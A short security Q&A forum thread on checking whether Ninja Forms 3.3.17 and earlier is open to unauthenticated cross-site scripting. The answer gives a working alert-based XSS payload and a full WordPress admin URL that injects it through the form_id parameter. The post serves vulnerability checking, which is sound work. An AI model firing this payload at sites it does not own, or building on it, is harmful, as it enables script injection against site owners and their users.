+1 vote
by (111 points)
Ninja Forms <= 3.3.17 is vulnerable to Unauthenticated Cross-Site Scripting. How can I check this?

1 Answer

0 votes
by (172 points)

You can check your site is vulnerable or not by inserting the payload 

"><script>alert(document.domain);</script>

in the "form_id" parameter like this.

http://wordpresssite/wp-admin/edit.php?post_status=all&post_type=nf_sub&form_id=1"><script>alert(document.domain);</script>&nf_form_filter&paged=1

Welcome to Codeshikari Q&A, where you can ask any vulnerability related questions and receive answers from the experts of the community. Screenshot-from-2019-03-15-23-08-47
...